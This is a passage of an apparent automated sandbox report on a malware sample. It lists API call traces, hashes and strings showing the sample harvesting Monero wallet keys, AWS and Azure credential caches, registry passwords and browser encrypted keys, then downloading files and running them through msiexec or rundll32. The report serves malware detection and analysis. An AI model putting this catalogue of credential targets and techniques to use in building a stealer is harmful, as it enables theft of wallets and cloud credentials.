                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: e59ce0a23df345db5d1233e381c2aa42d2b400aa100c659202f671ce5d0d9efb
                              • Instruction ID: 6e1abb283560617c1ae71b049d04e74a1a643cc3083ea037552e01a0b120b843
                              • Opcode Fuzzy Hash: e59ce0a23df345db5d1233e381c2aa42d2b400aa100c659202f671ce5d0d9efb
                              • Instruction Fuzzy Hash: B0E16F72810218ABCB04FBA0DD96EEE7338BF24301F804169F507B7291DF35AA15DB66
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,014AD2C0,00000000,?,001E144C,00000000,?,?), ref: 001CCA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 001CCA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 001CCA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CCAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 001CCAD9
                              • StrStrA.SHLWAPI(?,014AD140,001E0B52), ref: 001CCAF7
                              • StrStrA.SHLWAPI(00000000,014AD380), ref: 001CCB1E
                              • StrStrA.SHLWAPI(?,014ADA60,00000000,?,001E1458,00000000,?,00000000,00000000,?,014A8FC8,00000000,?,001E1454,00000000,?), ref: 001CCCA2
                              • StrStrA.SHLWAPI(00000000,014ADD20), ref: 001CCCB9
                                • Part of subcall function 001CC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 001CC871
                                • Part of subcall function 001CC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 001CC87C
                              • StrStrA.SHLWAPI(?,014ADD20,00000000,?,001E145C,00000000,?,00000000,014A90F8), ref: 001CCD5A
                              • StrStrA.SHLWAPI(00000000,014A9118), ref: 001CCD71
                                • Part of subcall function 001CC820: lstrcat.KERNEL32(?,001E0B46), ref: 001CC943
                                • Part of subcall function 001CC820: lstrcat.KERNEL32(?,001E0B47), ref: 001CC957
                                • Part of subcall function 001CC820: lstrcat.KERNEL32(?,001E0B4E), ref: 001CC978
                              • lstrlen.KERNEL32(00000000), ref: 001CCE44
                              • CloseHandle.KERNEL32(00000000), ref: 001CCE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 2006263ec960d4714c5ec74ffb3ecd9872b1f757be97b84ee78810620d2e8ea2
                              • Instruction ID: 528c9720f4476e76c469a1afc1f65a996345cc9b218cbd37d2cfc54a34d5042b
                              • Opcode Fuzzy Hash: 2006263ec960d4714c5ec74ffb3ecd9872b1f757be97b84ee78810620d2e8ea2
                              • Instruction Fuzzy Hash: 09E14771C00158ABDB14EBA4DD95FEE7778AF24300F80416AF50677291EF306A4ACF66
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • RegOpenKeyExA.ADVAPI32(00000000,014AB748,00000000,00020019,00000000,001E05B6), ref: 001D83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001D8426
                              • wsprintfA.USER32 ref: 001D8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001D847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D8499
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                              Strings
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 50a8d11458ab744efdf9285bae1c0de2d814fac27774b8ee2d80616e688cb7e9
                              • Instruction ID: c9df9a9b01e2b92fdee8e068cd88abf40695c5a031d056df881d44b5eb0bb462
                              • Opcode Fuzzy Hash: 50a8d11458ab744efdf9285bae1c0de2d814fac27774b8ee2d80616e688cb7e9
                              • Instruction Fuzzy Hash: 75811F71910228ABDB28DF54CD95FEA77B8FF18700F4082D9E509A6240DF71AB85CF95
                              APIs
                                • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001D4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 001D4DCD
                                • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D492C
                                • Part of subcall function 001D4910: FindFirstFileA.KERNEL32(?,?), ref: 001D4943
                              • lstrcat.KERNEL32(?,00000000), ref: 001D4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 001D4E59
                                • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FDC), ref: 001D4971
                                • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FE0), ref: 001D4987
                                • Part of subcall function 001D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 001D4B7D
                                • Part of subcall function 001D4910: FindClose.KERNEL32(000000FF), ref: 001D4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 001D4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 001D4EE5
                                • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D49B0
                                • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E08D2), ref: 001D49C5
                                • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D49E2
                                • Part of subcall function 001D4910: PathMatchSpecA.SHLWAPI(?,?), ref: 001D4A1E
                                • Part of subcall function 001D4910: lstrcat.KERNEL32(?,014AE968), ref: 001D4A4A
                                • Part of subcall function 001D4910: lstrcat.KERNEL32(?,001E0FF8), ref: 001D4A5C
                                • Part of subcall function 001D4910: lstrcat.KERNEL32(?,?), ref: 001D4A70
                                • Part of subcall function 001D4910: lstrcat.KERNEL32(?,001E0FFC), ref: 001D4A82
                                • Part of subcall function 001D4910: lstrcat.KERNEL32(?,?), ref: 001D4A96
                                • Part of subcall function 001D4910: CopyFileA.KERNEL32(?,?,00000001), ref: 001D4AAC
                                • Part of subcall function 001D4910: DeleteFileA.KERNEL32(?), ref: 001D4B31
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: c7aacc4a82886b55d9036378e10a9f378d406d1c2517f366ebc166aa60ca8f14
                              • Instruction ID: 5a252cf23816ec3cfb9bc735fb76d9f1138b38bf0b6e7a284e60b5615d067eb3
                              • Opcode Fuzzy Hash: c7aacc4a82886b55d9036378e10a9f378d406d1c2517f366ebc166aa60ca8f14
                              • Instruction Fuzzy Hash: 9841C2BA94025867DB10F760EC47FED3338AB75700F404494B589661C2EFB49BC98B92
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001D906C
                              Strings
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: be18e5f90ecb0e4f6af53a4f9e90bce9257f5d9acf907dba24284b2526c4eb0e
                              • Instruction ID: 254b9fa1824602b73afabc77f72379dbb87b8c8e613d3a5df276e79038bd2b9e
                              • Opcode Fuzzy Hash: be18e5f90ecb0e4f6af53a4f9e90bce9257f5d9acf907dba24284b2526c4eb0e
                              • Instruction Fuzzy Hash: 9471F9B5A10208ABDB04EFE4DD89FEEB7B8BF58300F108518F516A7290DB34E905CB65
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001D31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001D335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001D34EA
                              Strings
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 311bde9e6e7f60ece6d0fea23f9dde12e4be1c49f7b6ac2414ed586481c757f4
                              • Instruction ID: a0018f5e7bf88ff4f94305a5ad43e1d39999ed3e620f65d2a5fd6b52a34daad8
                              • Opcode Fuzzy Hash: 311bde9e6e7f60ece6d0fea23f9dde12e4be1c49f7b6ac2414ed586481c757f4
                              • Instruction Fuzzy Hash: 831246718001589ADB09FBA0DCA2FDEB738AF34300F90416AF50676291EF742B4ACF56
                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C6280: InternetOpenA.WININET(001E0DFE,00000001,00000000,00000000,00000000), ref: 001C62E1
                                • Part of subcall function 001C6280: StrCmpCA.SHLWAPI(?,014AE9B8), ref: 001C6303
                                • Part of subcall function 001C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C6335
                                • Part of subcall function 001C6280: HttpOpenRequestA.WININET(00000000,GET,?,014AE110,00000000,00000000,00400100,00000000), ref: 001C6385
                                • Part of subcall function 001C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001C63BF
                                • Part of subcall function 001C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C63D1
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5318
                              • lstrlen.KERNEL32(00000000), ref: 001D532F
                                • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 001D5364
                              • lstrlen.KERNEL32(00000000), ref: 001D5383
                              • lstrlen.KERNEL32(00000000), ref: 001D53AE
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 263a2fd94954516ed8bdca096b655b9b6a0a6e79db320d6a299a751e35e3502b
                              • Instruction ID: d0b6ce5beaa45ba40e8219f8886eaf0dec2d32dd74162bcce9619a732fac870b
                              • Opcode Fuzzy Hash: 263a2fd94954516ed8bdca096b655b9b6a0a6e79db320d6a299a751e35e3502b
                              • Instruction Fuzzy Hash: 74514430950148EBCB18FF64CD96EED7779AF20301F904019F8066B292EF34AB45DBA6
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 80d1a05566361c89047abe2bb6585e57e0f8f7b0dc8e93e2f9d9bd95966cd371
                              • Instruction ID: fc94b174f8036c002ae066ccf4e27a203a41b1fa0bf6722ded3818d1506b79e9
                              • Opcode Fuzzy Hash: 80d1a05566361c89047abe2bb6585e57e0f8f7b0dc8e93e2f9d9bd95966cd371
                              • Instruction Fuzzy Hash: EFC1B7B5940219ABCB14EF60DD89FEE7378BF64304F004599F50A67381EB70AA85CF95
                              APIs
                                • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001D42EC
                              • lstrcat.KERNEL32(?,014AE5D8), ref: 001D430B
                              • lstrcat.KERNEL32(?,?), ref: 001D431F
                              • lstrcat.KERNEL32(?,014AD230), ref: 001D4333
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001D8D90: GetFileAttributesA.KERNEL32(00000000,?,001C1B54,?,?,001E564C,?,?,001E0E1F), ref: 001D8D9F
                                • Part of subcall function 001C9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 001C9D39
                                • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                                • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                                • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                                • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                                • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                                • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                                • Part of subcall function 001D93C0: GlobalAlloc.KERNEL32(00000000,001D43DD,001D43DD), ref: 001D93D3
                              • StrStrA.SHLWAPI(?,014AE590), ref: 001D43F3
                              • GlobalFree.KERNEL32(?), ref: 001D4512
                                • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
                                • Part of subcall function 001C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,001C4EEE,00000000,?), ref: 001C9B01
                                • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9B2A
                                • Part of subcall function 001C9AC0: LocalFree.KERNEL32(?,?,?,?,001C4EEE,00000000,?), ref: 001C9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 001D44A3
                              • StrCmpCA.SHLWAPI(?,001E08D1), ref: 001D44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001D44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 001D44E5
                              • lstrcat.KERNEL32(00000000,001E0FB8), ref: 001D44F4
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: cbf101e6daebb3bc9d94b6f76cf04ffee67905c297c6e44d6785011986c4aead
                              • Instruction ID: 69fda7a01610cc7d3d1a7e2854bc4da5a0b740ac7491de670ab64febed19215f
                              • Opcode Fuzzy Hash: cbf101e6daebb3bc9d94b6f76cf04ffee67905c297c6e44d6785011986c4aead
                              • Instruction Fuzzy Hash: A67166B6900218ABCB14FBA0DC99FEE7379AF98300F008599F605A7181EB75DB55CF91
                              APIs
                                • Part of subcall function 001C12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C12B4
                                • Part of subcall function 001C12A0: RtlAllocateHeap.NTDLL(00000000), ref: 001C12BB
                                • Part of subcall function 001C12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001C12D7
                                • Part of subcall function 001C12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001C12F5
                                • Part of subcall function 001C12A0: RegCloseKey.ADVAPI32(?), ref: 001C12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 001C134F
                              • lstrlen.KERNEL32(?), ref: 001C135C
                              • lstrcat.KERNEL32(?,.keys), ref: 001C1377
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,014AA360,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 001C1465
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                                • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                                • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                                • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                                • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                                • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 001C14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: a14e0a8f51945a971e257e139ae7fa32529e20187fc313abd9d600fb71b4ca36
                              • Instruction ID: 411e7ca597266069fa0d17c0f282e4bce637fcfeb4e30910c2de51d4711bd8c4
                              • Opcode Fuzzy Hash: a14e0a8f51945a971e257e139ae7fa32529e20187fc313abd9d600fb71b4ca36
                              • Instruction Fuzzy Hash: FA5146B1D5015957CB15FB60DD92FED737CAF64300F8041A9B60A62182EF706B89CFA6
                              APIs
                                • Part of subcall function 001C72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001C733A
                                • Part of subcall function 001C72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001C73B1
                                • Part of subcall function 001C72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 001C740D
                                • Part of subcall function 001C72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 001C7452
                                • Part of subcall function 001C72D0: HeapFree.KERNEL32(00000000), ref: 001C7459
                              • lstrcat.KERNEL32(00000000,001E17FC), ref: 001C7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001C7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 001C765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001C768F
                              • lstrcat.KERNEL32(00000000,001E1804), ref: 001C76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001C76D3
                              • lstrcat.KERNEL32(00000000,001E1808), ref: 001C76ED
                              • task.LIBCPMTD ref: 001C76FB
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 8f9657cf2b4a50c3923ae7150a60a7ab076db5d197b41ff9cf51312a4ef105d7
                              • Instruction ID: 8e2cea0fe2f44280483a916a627d2a918bc0b9fa1eded31960ce1b7a6471ee4b
                              • Opcode Fuzzy Hash: 8f9657cf2b4a50c3923ae7150a60a7ab076db5d197b41ff9cf51312a4ef105d7
                              • Instruction Fuzzy Hash: 87316E72900209EFCB08EBB5DD85EFE73B8BB64301B144528F102B7290DB34E956CB55
                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                                • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                              • InternetOpenA.WININET(001E0DF7,00000001,00000000,00000000,00000000), ref: 001C610F
                              • StrCmpCA.SHLWAPI(?,014AE9B8), ref: 001C6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001C618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001C61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 001C61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001C620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 001C6249
                              • InternetCloseHandle.WININET(?), ref: 001C6253
                              • InternetCloseHandle.WININET(00000000), ref: 001C6260
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: a8979e8117faafb21d48da2b541f69e72e5528f290d6e0858afda0feb8de30c1
                              • Instruction ID: f7bb18dd6ad4da4483ae7db160bab8219b40b6e7bcd9f6cbd505d300e665de7f
                              • Opcode Fuzzy Hash: a8979e8117faafb21d48da2b541f69e72e5528f290d6e0858afda0feb8de30c1
                              • Instruction Fuzzy Hash: 86516EB1900218ABDB20DF90DD45FEE77B8EF54701F1080A8A605A7180DB74AA85CF99
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001C733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001C73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 001C740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 001C7452
                              • HeapFree.KERNEL32(00000000), ref: 001C7459
                              • task.LIBCPMTD ref: 001C7555
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 983efe550947f7bd7b6706bea103f31df3699e89ecde1e6c3ca32747da8ec2cb
                              • Instruction ID: 1d8d2ea39a9085014b83ecbf02f6b577c8face05f7648f10d8425b6f276a5ee8
                              • Opcode Fuzzy Hash: 983efe550947f7bd7b6706bea103f31df3699e89ecde1e6c3ca32747da8ec2cb
                              • Instruction Fuzzy Hash: 6B611EB59142589BDB24DB50CC95FDAB7B8BF64300F0081E9E689A6181DFB09FC9CF91
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                              • lstrlen.KERNEL32(00000000), ref: 001CBC9F
                                • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 001CBCCD
                              • lstrlen.KERNEL32(00000000), ref: 001CBDA5
                              • lstrlen.KERNEL32(00000000), ref: 001CBDB9
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: c0889f62681aaf87e5458e4c932d0308e57dd001dc17f928661dd585d6ece3ab
                              • Instruction ID: d909545cdd75544b749e00abdb7bb243a16dea49dbfcec92b9c42b72b5f73d7b
                              • Opcode Fuzzy Hash: c0889f62681aaf87e5458e4c932d0308e57dd001dc17f928661dd585d6ece3ab
                              • Instruction Fuzzy Hash: 18B15571910158ABDF04FBA0CD96EEE7338AF64301F804569F506B3291EF346E49DBA6
                              APIs
                              Strings
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 03dde7e81fec5d96dc8fd7c22c12825b73de995d2d965908f4efaeec7a897302
                              • Instruction ID: f3d1579eb177c81c0adeaff34cb6aaccbe709001630ba7782be5a8375e53862b
                              • Opcode Fuzzy Hash: 03dde7e81fec5d96dc8fd7c22c12825b73de995d2d965908f4efaeec7a897302
